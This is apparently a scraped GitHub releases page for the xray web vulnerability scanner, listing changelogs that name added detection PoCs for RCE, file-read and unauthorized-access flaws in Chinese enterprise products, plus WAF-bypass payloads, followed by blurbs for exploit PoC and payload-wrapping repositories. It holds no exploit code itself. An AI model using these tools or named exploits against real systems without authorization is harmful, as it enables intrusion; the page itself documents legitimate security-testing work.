      • poc-yaml-sangfor-edr-cssp-rce 深信服 EDR CSSP 3.2.21 任意代码执行
      • poc-yaml-nsfocus-uts-password-leak 绿盟 UTS 综合威胁探针管理员任意登录
      • poc-yaml-weaver-ebridge-file-read-linux 泛微 Ebridge 任意文件读取 - linux
      • poc-yaml-weaver-ebridge-file-read-windows 泛微 Ebridge 任意文件读取 - windows
      • poc-yaml-thinkadmin-v6-readfile ThinkAdmin V6 任意文件读取
      • poc-yaml-phpstudy-nginx-wrong-resolve phpstudy nginx 解析漏洞
      • poc-yaml-hikvision-cve-2017-7921 海康威视用户泄露&未授权访问
      • poc-yaml-thinkcmf-lfi Thinkcmf 框架文件包含
      • poc-yaml-ueditor-cnvd-2017-20077-file-upload UEditor 任意文件上传
      • poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation 修罗BBS重安装漏洞
      • poc-yaml-xunchi-cnvd-2020-23735-file-read 迅优cms任意文件读取
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(18.59 MB)
    xray_linux_386.zip(17.52 MB)
    xray_linux_amd64.zip(18.10 MB)
    xray_linux_arm.zip(17.28 MB)
    xray_linux_arm64.zip(17.23 MB)
    xray_windows_386.exe.zip(17.41 MB)
    xray_windows_amd64.exe.zip(17.98 MB)
  • 1.3.2(Sep 17, 2020)

    Featues:

    • 同步社区新增检测 POC,支持当下热门漏洞检测,需自行合并到配置文件或重新生成配置文件来使用 ,仅更新版本不更新配置文件不会生效!

      • poc-yaml-yonyou-grp-u8-sqli-to-rce 用友 GRP-U8 注入&远程命令执行
      • poc-yaml-sangfor-edr-cssp-rce 深信服 EDR CSSP 3.2.21 任意代码执行
      • poc-yaml-nsfocus-uts-password-leak 绿盟 UTS 综合威胁探针管理员任意登录
      • poc-yaml-weaver-ebridge-file-read-linux 泛微 Ebridge 任意文件读取 - linux
      • poc-yaml-weaver-ebridge-file-read-windows 泛微 Ebridge 任意文件读取 - windows
      • poc-yaml-thinkadmin-v6-readfile ThinkAdmin V6 任意文件读取
      • poc-yaml-phpstudy-nginx-wrong-resolve phpstudy nginx 解析漏洞
      • poc-yaml-hikvision-cve-2017-7921 海康威视用户泄露&未授权访问
      • poc-yaml-thinkcmf-lfi Thinkcmf 框架文件包含
      • poc-yaml-ueditor-cnvd-2017-20077-file-upload UEditor 任意文件上传
      • poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation 修罗BBS重安装漏洞
      • poc-yaml-xunchi-cnvd-2020-23735-file-read 迅优cms任意文件读取
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(17.72 MB)
    xray_linux_386.zip(16.64 MB)
    xray_linux_amd64.zip(17.22 MB)
    xray_linux_arm.zip(16.40 MB)
    xray_linux_arm64.zip(16.36 MB)
    xray_windows_386.exe.zip(16.54 MB)
    xray_windows_amd64.exe.zip(17.11 MB)
  • 1.3.0(Aug 27, 2020)

    Features:

    • 改进高级版授权验证机制,旧版授权不再支持,需要联系管理员重新签发
    • 改进普通爬虫实现逻辑,更加可靠和稳定
    • 部分平台自动调整 rlimit 限制,避免因此导致的请求失败
    • baseline 插件新增检查项,需自行开启:
      • detect_china_bank_card 检查银行卡号泄露
      • detect_china_address 检测街道地址泄露
    • 同步社区新增检测 POC,支持部分 HW 热门漏洞检测,需自行合并到配置文件或重新生成配置文件
      • poc-yaml-sangfor-edr-arbitrary-admin-login
      • poc-yaml-sangfor-edr-rce
      • poc-yaml-tongda-meeting-unauthorized-access
      • poc-yaml-citrix-cve-2020-8193-unauthorized
      • poc-yaml-bt742-pma-unauthorized-access
      • poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization
      • poc-yaml-apacheofbiz-cve-2018-8033-xxe
      • poc-yaml-jenkins-unauthorized-access
      • poc-yaml-joomla-component-vreview-sql
      • poc-yaml-joomla-cve-2018-7314-sql
      • poc-yaml-jupyter-notebook-unauthorized-access
      • poc-yaml-nexusdb-cve-2020-24571-path-traversal
      • poc-yaml-openfire-cve-2019-18394-ssrf
      • poc-yaml-wordpress-cve-2019-19985-infoleak

    Bugfixes:

    • 修复 sql 注入部分网站扫不出的问题 https://github.com/chaitin/xray/issues/834
    • 修复 shiro 自定义 aes_key 不生效的问题
    • 修复 poc-yaml-thinkcmf-write-shell 未闭合导致的错误
    • 修复 poc-yaml-draytek-cve-2020-8515 的误报
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(18.57 MB)
    xray_linux_386.zip(17.50 MB)
    xray_linux_amd64.zip(18.09 MB)
    xray_linux_arm.zip(17.26 MB)
    xray_linux_arm64.zip(17.23 MB)
    xray_windows_386.exe.zip(17.40 MB)
    xray_windows_amd64.exe.zip(17.97 MB)
  • 1.2.0(Aug 12, 2020)

    Features:

    • 高级版新增浏览器爬虫支持
      • 独立二进制,需单独下载安装使用 https://github.com/chaitin/rad
      • 高级版支持一键扫描webscan --browser-crawler http:/xxx
    • 同步社区版 POC 改动
      • 新增 poc-yaml-vbulletin-cve-2019-16759-bypass
      • 修复 poc-yaml-citrix-cve-2020-8191-xss

    Bugfixes:

    • shiro 扫描增加重确认机制,避免误报
    • 修复 .svn/entries 扫不出的问题 https://github.com/chaitin/xray/issues/820
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(18.90 MB)
    xray_linux_386.zip(17.87 MB)
    xray_linux_amd64.zip(18.43 MB)
    xray_linux_arm.zip(17.64 MB)
    xray_linux_arm64.zip(17.58 MB)
    xray_windows_386.exe.zip(17.76 MB)
    xray_windows_amd64.exe.zip(18.32 MB)
  • 1.1.8(Aug 4, 2020)

    Bugfixes:

    • 修复 Shiro 检测遇到多个 deleteMe 时漏报的问题
    • 修复 Tomcat 回显 ClassNotFoundException 的问题
    • 修复 poc-yaml-draytek-cve-2020-8515 误报问题
    • 修复 poc-yaml-jira-ssrf-cve-2019-8451 误报问题
    • 修复 .so 结尾的网址不被扫描的问题
    • 修复 baseline 插件部分漏洞重复问题
    • 修复部分场景下 cookie 配置不生效的问题

    Changes:

    • 子域名dns server 为空时不再报错退出,而是使用默认 server
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(19.04 MB)
    xray_linux_386.zip(17.98 MB)
    xray_linux_amd64.zip(18.55 MB)
    xray_linux_arm.zip(17.75 MB)
    xray_linux_arm64.zip(17.70 MB)
    xray_windows_386.exe.zip(17.88 MB)
    xray_windows_amd64.exe.zip(18.44 MB)
  • 1.1.6(Jul 30, 2020)

    Features:

    • 进一步改进 shiro 检测插件
      • 使用新的方法检测 shiro key,完全去除反连平台的依赖,思路来自 @l1nk3r
      • 支持配置默认使用的 cookie name,默认为 rememberMe
      • 支持自动监测并扫描非默认 cookie name 的情况
    • 增加 force-ssl 配置项,可以与 raw-request 搭配使用来扫描单个 ssl 请求
    • 新增如下社区提交 POC,已经打包到二进制中,完整使用需删除配置文件并重新生成
      • poc-yaml-harbor-cve-2019-16097
      • poc-yaml-fortigate-cve-2018-13379-readfile
      • poc-yaml-draytek-cve-2020-8515
      • poc-yaml-cisco-cve-2020-3452-readfile

    Bugfixes:

    • 修复 poc-yaml-jira-cve-2019-8449 误报问题
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(19.04 MB)
    xray_linux_386.zip(17.98 MB)
    xray_linux_amd64.zip(18.55 MB)
    xray_linux_arm.zip(17.75 MB)
    xray_linux_arm64.zip(17.70 MB)
    xray_windows_386.exe.zip(17.87 MB)
    xray_windows_amd64.exe.zip(18.43 MB)
  • 1.1.0(Jul 17, 2020)

    Features:

    • 新增 shiro 漏洞检测插件 (仅高级版),支持 RememberMe 反序列化漏洞检测
      • 内置独家 Java 反序列化利用链,有效作用于 shiro 环境
      • 内置 Payload 支持全版本 Tomcat 回显,Tomcat 6,7,8,9 均通过测试
      • 借助反连平台可以完美支持非 Tomcat 环境的漏洞检测
      • 完整转置 ysoserial 至 Go 代码,无需 Java 依赖即可运行
      • 自带 shiro 100 key,且支持通过配置文件自定义 shiro key
    • 基于端口复用技术,合并 RMI 与 HTTP 服务,简化部署成本
    • baseline 插件新增手机号泄露检测,需手动开启 detect_china_phone_number
    • 子域名 html 报告按 500 条分报告写入,防止数据太大打不开 https://github.com/chaitin/xray/issues/792
    • 新增下列社区贡献 POC,已经打包到二进制中,目前共计 170 POC,完整使用需删除配置文件并重新生成
      • poc-yaml-apache-flink-upload-rce
      • poc-yaml-aspcms-backend-leak
      • poc-yaml-citrix-cve-2020-8191-xss
      • poc-yaml-consul-rexec-rce
      • poc-yaml-consul-service-rce
      • poc-yaml-f5-tmui-cve-2020-5902-rce
      • poc-yaml-nexus-default-password
      • poc-yaml-qnap-cve-2019-7192
      • poc-yaml-spring-cloud-cve-2020-5410

    Bugfixes:

    • 修复 baseline 插件 header 值大小写误报问题 https://github.com/chaitin/xray/issues/796
    • POC 语法中,header 的 key 改为大小写不敏感
    • 修复两个 POC 的误报问题
      • poc-go-tongda-arbitrary-auth
      • joomla-cnvd-2019-34135-rce.yml

    Changes:

    • 配置文件、证书文件、授权文件都从 xray 二进制所在目录加载而不是 shell 当前目录
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(18.59 MB)
    xray_linux_386.zip(17.56 MB)
    xray_linux_amd64.zip(18.12 MB)
    xray_linux_arm.zip(17.36 MB)
    xray_linux_arm64.zip(17.31 MB)
    xray_windows_386.exe.zip(17.46 MB)
    xray_windows_amd64.exe.zip(18.00 MB)
  • 1.0.4(Jun 23, 2020)

    Features:

    • 反连平台支持配置 ip 获取方式 reverse/http/ip_header,以支持在 Nginx 等反向代理后工作的场景。

    Bugfixes:

    • 修复 header 配置不生效的问题
    • 修复基础爬虫中一处竞争问题
    • 修复部分情况下高级版授权加载失败的问题
    • 修复 laravel-debug-info-leak poc 的误报

    Changes:

    • 由于发现 4.2.2.1 存在大量误解析的情况,子域名配置中的 servers 包含4.2.2.1 时将默认去除该 server
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(18.49 MB)
    xray_linux_386.zip(17.47 MB)
    xray_linux_amd64.zip(18.03 MB)
    xray_linux_arm.zip(17.27 MB)
    xray_linux_arm64.zip(17.22 MB)
    xray_windows_386.exe.zip(17.37 MB)
    xray_windows_amd64.exe.zip(17.91 MB)
  • 1.0.0(Jun 13, 2020)

    我们在去年的今天发布了 xray 0.1.0 版本,一年的时间内,我们发布了 43 个版本,公开收集了 157 个 poc,已经成为安全社区最好用的工具之一。

    为了感谢大家对 xray 的支持,一周年特别准备了"阳光普照奖" : 扫码关注 xray 社区公众号,回复 "高级版领取",即可得到两个月有效期的 xray 高级版。

    注意:下载后需要将文件名手动改为 xray-license.lic,放置在 xray 二进制同一目录并删除之前的配置文件才能使用高级版的全部功能。

    qrcode_for_gh_a5a18dced368_258


    以下为 xray 一周年纪念版的更新内容

    Features:

    • 重新打造企业级子域名收集模块,在高级版中提供体验
      • 智能 dns server 调度算法,保证扫描可靠性和稳定性,同时保持低资源占用
      • 集成爆破、api、html 页面、js 分析、域传送等多种收集模块
      • 新增子域名 webhook、json 和 html 报告文件输出
    • http 客户端支持配置多个代理、根据域名切换代理、根据权重进行代理负载均衡等,使用方法见 https://xray.cool/xray/#/configration/http
    • 命令注入模块增加非注入型代码执行检测
    • fastjson 模块增加部分 waf 绕过 payload
    • 优化 jsonp、thinkphp 等模块的实现
    • dirscan 支持根据 url 动态生成 payload,比如访问 s.php 将会尝试扫描 .s.php.swp 等敏感文件
    • dirscan 支持 sourcemap 泄露扫描
    • windows 二进制文件增加图标

    Bugfixes:

    • 修复 sql 注入、bruteforce 等模块中的一些问题
    • 修复 fastjson 报告输出中,没有 request body 的问题
    • 修复 tomcat-cve-2017-12615-rcetongda-lfi-upload-rce 等 poc 的误报
    • 修复 json 参数解析和替换的一些问题
    • 修复 html 报告中 url 过长导致页面溢出的问题

    Changes:

    • 移除交互式 shell 功能
    • 使用全新的配置文件格式,旧版本的配置将不再兼容,需要备份删除,xray 将自动生成新版配置文件
      • 修改了 http 配置,支持配置多个代理
      • 修改了 http 配置,将 header 与 cookie 配置项合并和简化
      • 隐藏了 baseline 中部分意义不大的选项
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(18.52 MB)
    xray_linux_386.zip(17.49 MB)
    xray_linux_amd64.zip(18.05 MB)
    xray_linux_arm.zip(17.29 MB)
    xray_linux_arm64.zip(17.24 MB)
    xray_windows_386.exe.zip(17.39 MB)
    xray_windows_amd64.exe.zip(17.93 MB)
  • 0.21.8(Apr 29, 2020)

    本次更新存在新增配置,建议重新生成配置文件

    Features:

    • 全局支持内嵌 JSON 的参数解析和变换
      • ?a={"p":"q","x":"y"} 将视为存在两个参数 p,x 并分别进行漏洞探测
    • 优先使用国内 cdn 下载线路,提升国内用户版本升级体验 ./xray upgrade (从下版本起生效)
    • 内置通达OA任意用户登录检测POC poc-go-tongda-arbitrary-auth
    • 扩充 baseline 插件检测项(新配置默认不开启)
      • 基础暗链检测 detect_dark_chain
      • Host 头注入 detect_host_injection
    • 优化目录扫描插件,更合理的生成动态扫描字典
    • HTML 报告添加 Index 列

    Bugfixes:

    • 优化 sql 注入插件,解决部分已知的误报和漏报
    • 修复某些情况因 xml 识别错误导致 xxe 漏报问题

    Changes:

    • 低内存占用时不再打印内存统计信息
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(1.13 KB)
    xray_darwin_amd64.zip(12.96 MB)
    xray_linux_386.zip(11.89 MB)
    xray_linux_amd64.zip(12.50 MB)
    xray_linux_arm.zip(11.69 MB)
    xray_linux_arm64.zip(11.64 MB)
    xray_windows_386.exe.zip(11.80 MB)
    xray_windows_amd64.exe.zip(12.39 MB)
  • 0.21.0(Apr 8, 2020)

    Features:

    • 优化 sql 注入检测逻辑,降低误报率
    • 定期打印内存用量统计 (debug: 5s, info: 25s)
    • 重写 HTML 报告 [已开源]
      • 无需网络即可打开,大幅提升打开速度
      • 新增搜索、排序、筛选、复制等功能
      • servicescan 支持输出 html 报告 --html-output

    Bugfixes:

    • 修复一处潜在的竞争问题
    • 修复一处反连平台的内存泄露问题
    • 修复因调度改动导致的扫描速度慢的问题
    • 修复 content-type 为空时 xss 的误报问题

    Changes:

    • 当配置了 http 的 proxy 而未配置 mitm 中的 upstream_proxy 时,后者将使用前者代理配置
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(630 bytes)
    xray_darwin_amd64.zip(12.87 MB)
    xray_linux_386.zip(11.80 MB)
    xray_linux_amd64.zip(12.41 MB)
    xray_linux_arm.zip(11.61 MB)
    xray_linux_arm64.zip(11.56 MB)
    xray_windows_386.exe.zip(11.72 MB)
    xray_windows_amd64.exe.zip(12.31 MB)
  • 0.20.0(Mar 19, 2020)

    Features:

    • 重构扫描调度逻辑,扫描速度更快
    • 优化队列结构,降低队列堆积速度
    • 添加通达OA任意文件包含RCE漏洞检测 POC (poc-go-tongda-lfi-upload-rce)
    • dirscan 增加 depth 配置

    Bugfixes:

    • 修复某种情况下过滤器工作不正常的问题
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(630 bytes)
    xray_darwin_amd64.zip(12.33 MB)
    xray_linux_386.zip(11.26 MB)
    xray_linux_amd64.zip(11.86 MB)
    xray_linux_arm.zip(11.06 MB)
    xray_linux_arm64.zip(11.03 MB)
    xray_windows_386.exe.zip(11.17 MB)
    xray_windows_amd64.exe.zip(11.76 MB)
  • 0.19.4(Mar 5, 2020)

    Features:

    • 服务扫描增加 --webhook-output 选项
    • webhook 的请求本身不再使用 http 配置中的代理
    • fastjson 插件增加 org.apache.xbean.propertyeditor.JndiConverter 的 gadget
    • brute_force 插件增加 detect_default_passworddetect_unsafe_login_method 的配置项
    • thinkphp 插件增加 detect_think_php_sql_injection 配置项
    • 幽灵猫漏洞检测插件增加基于文件读取的检测方式
    • 优化 cli 统计信息输出
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(630 bytes)
    xray_darwin_amd64.zip(12.33 MB)
    xray_linux_386.zip(11.26 MB)
    xray_linux_amd64.zip(11.86 MB)
    xray_linux_arm.zip(11.06 MB)
    xray_linux_arm64.zip(11.03 MB)
    xray_windows_386.exe.zip(11.17 MB)
    xray_windows_amd64.exe.zip(11.76 MB)
  • 0.19.2(Feb 20, 2020)

    Features:

    • 添加 servicescan 命令,支持 Tomcat AJP 协议任意文件读取漏洞(幽灵猫漏洞 https://www.chaitin.cn/zh/ghostcat)
      • 使用示例 ./xray servicescan --target 127.0.0.1:8009
      • 批量检测 ./xray servicescan --target-file example.txt
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(630 bytes)
    xray_darwin_amd64.zip(12.32 MB)
    xray_linux_386.zip(11.25 MB)
    xray_linux_amd64.zip(11.85 MB)
    xray_linux_arm.zip(11.06 MB)
    xray_linux_arm64.zip(11.02 MB)
    xray_windows_386.exe.zip(11.17 MB)
    xray_windows_amd64.exe.zip(11.75 MB)
  • 0.19.0(Feb 19, 2020)

    Features:

    • redirect 模块增加 js 跳转的支持
    • xss 模块支持 location based xss
    • html 报告改为延迟创建,而不是立即创建
    • 更加智能的设置最大 goroutine 的数量

    Bugfixes:

    • 修复 cmd_injection、dirscan、brute_force 模块的部分误报
    • 修复 jsonp 的一种情况的漏报
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(630 bytes)
    xray_darwin_amd64.zip(12.29 MB)
    xray_linux_386.zip(11.23 MB)
    xray_linux_amd64.zip(11.83 MB)
    xray_linux_arm.zip(11.04 MB)
    xray_linux_arm64.zip(10.99 MB)
    xray_windows_386.exe.zip(11.14 MB)
    xray_windows_amd64.exe.zip(11.73 MB)
  • 0.18.2(Jan 8, 2020)

    Features:

    • 大幅改善网络比较差或有 waf 时的扫描速度
    • 优化过滤策略,减少不必要的扫描请求

    Bugfixes:

    • 修复代理配置密码时偶发性崩溃问题

    网盘下载链接: https://yunpan.360.cn/surl_y3Gu6cugi8u

    Source code(tar.gz)
    Source code(zip)
    sha256.txt(630 bytes)
    xray_darwin_amd64.zip(12.26 MB)
    xray_linux_386.zip(11.19 MB)
    xray_linux_amd64.zip(11.79 MB)
    xray_linux_arm.zip(10.99 MB)
    xray_linux_arm64.zip(10.95 MB)
    xray_windows_386.exe.zip(11.11 MB)
    xray_windows_amd64.exe.zip(11.69 MB)
  • 0.18.0(Jan 3, 2020)

    Features:

    • 完善 sql 注入的报错检测
    • 完善反连平台前端,增加 RMI 请求展示
    • poc 中增加 substr(string, int, int) 字符串截取函数
    • 优化代理对文件下载的处理,防止潜在的内存占用过大的问题
    • 优化 xss 插件输出的 payload
    • 增加 fastjson 插件对 query 位置 json 的处理
    • 增加 arm v7 32 位构建

    Bugfixes:

    • 修复部分情况下 https 代理不能正常工作的问题
    • 修复 Windows 下反连平台前端不能工作的问题
    • 修复子域名爆破模块处理泛解析的一些问题
    Source code(tar.gz)
    Source code(zip)
    sha256.txt(630 bytes)
    xray_darwin_amd64.zip(12.25 MB)
    xray_linux_386.zip(11.18 MB)
    xray_linux_amd64.zip(11.78 MB)
    xray_linux_arm.zip(10.99 MB)
    xray_linux_arm64.zip(10.95 MB)
    xray_windows_386.exe.zip(11.10 MB)
    xray_windows_amd64.exe.zip(11.68 MB)
Owner
Chaitin Tech
长亭科技
Chaitin Tech
Poc-cve-2021-4034 - PoC for CVE-2021-4034 dubbed pwnkit

poc-cve-2021-4034 PoC for CVE-2021-4034 dubbed pwnkit Compile exploit.go go buil

Daniele Linguaglossa 96 Nov 9, 2022
PoC for running AWS services(kinesis, dynamodb, lambdas) locally with Localstack

hotdog-localstack-PoC PoC for running AWS services(kinesis, dynamodb, lambdas) locally with Localstack alias awslocal="aws --endpoint-url=http://local

Talha Altınel 39 Dec 3, 2022
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.

ZipExec ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded i

Tylous 938 Dec 31, 2022
An improvement on the PoC for the privacy-preserving contact discovery scheme I implemented as part of my UCL masters degree

Privacy-Preserving Contact Discovery / ARKE - PoC This is an improved version of the work I submitted as part of my masters degree dissertation at UCL

Nicolas Mohnblatt 0 Dec 18, 2021
PoC for CVE-2015-1635 / MS15-034 - HTTP.sys Allows Remote Code Execution / Check & DOS

CVE-2015-1635 PoC for CVE-2015-1635 / MS15-034 - HTTP.sys Allows Remote Code Execution / Check & DOS ./MS15-034 <URL> <RESOURCE> <FLAG [0 or 18]> Note

Nikola Kipariz Stamov 0 Nov 3, 2021
A CVE-2021-22205 Gitlab RCE POC written in Golang

Golang-CVE-2021-22205-POC A bare bones CVE-2021-22205 Gitlab RCE POC written in Golang which affects Gitlab CE/EE < 13.10.3 Gitlab CE/EE < 13.9.6 Gitl

Matt 3 Jul 4, 2022
PoC for CVE-2021-41277

CVE-2021-41277 PoC Metabase is an open source data analytics platform. Local File Inclusion issue has been discovered in some versions of metabase. He

Burak Tahtacı 7 Dec 3, 2021
Gocrypter - Crypter em golang (POC)

Gocrypter Crypter em golang (POC) Uso ./gocrypter <executável> Estágios do crypter Comprimi o arquivo malicioso usando a ZLIB Criptografa os bytes res

Pablo Henrique 1 Jan 2, 2022
Go poc - Golang proof of concept

quickstart tar -zxvf go1.17.6.linux-amd64.tar.gz -C ~/tools/ echo "export PATH=

ileson 0 Jan 8, 2022
Vishnu - Golang port-knocking PoC

Vishnu(The Hidden Backdoor) Taken from the Trimurit, the triple deity of supreme

Pablo Potat0 9 Nov 9, 2022
🗡 Molag is a POC/awareness project for dependency risks.

molag // ?? WIP Intro This is a POC package, showcasing why dependencies in general (in any programming language/framework) are a bad idea. This does

SUDOLESS 0 Sep 23, 2022
SandboxPPL - Golang PoC that sandboxes Defender (or other PPL) by setting its token integrity to Untrusted

SandboxPPL Golang PoC that sandboxes Defender (or other PPL) by setting its toke

null 10 Jul 1, 2022
A web-based testing platform for WAF (Web Application Firewall)'s correctness

WAFLab ?? WAFLab is a web-based platform for testing WAFs. Live Demo https://waflab.org/ Architecture WAFLab contains 2 parts: Name Description Langua

Microsoft 25 Oct 25, 2022
Web-Security-Academy - Web Security Academy, developed in GO

Web-Security-Academy - Web Security Academy, developed in GO

Xavier Llauca 1 Feb 23, 2022
Gryffin is a large scale web security scanning platform.

Gryffin (beta) Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems w

Yahoo 2.1k Dec 27, 2022
set of web security test cases and a toolkit to construct new ones

Webseclab Webseclab contains a sample set of web security test cases and a toolkit to construct new ones. It can be used for testing security scanners

Yahoo 916 Jan 7, 2023
Open Source Web Application Firewall

DEPRECATED This repository started as a good idea but I didn't have enough time or desire to work on it. So, it's left here for historical / education

Ahmet Salih 187 Nov 24, 2022
Fast web fuzzer written in Go

/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \

null 8.4k Jan 5, 2023
Coraza WAF is a golang modsecurity compatible web application firewall library

Coraza Web Application Firewall, this project is a Golang port of ModSecurity with the goal to become the first enterprise-grade Open Source Web Application Firewall, flexible and powerful enough to serve as the baseline for many projects.

Juan Pablo Tosso 849 Jan 9, 2023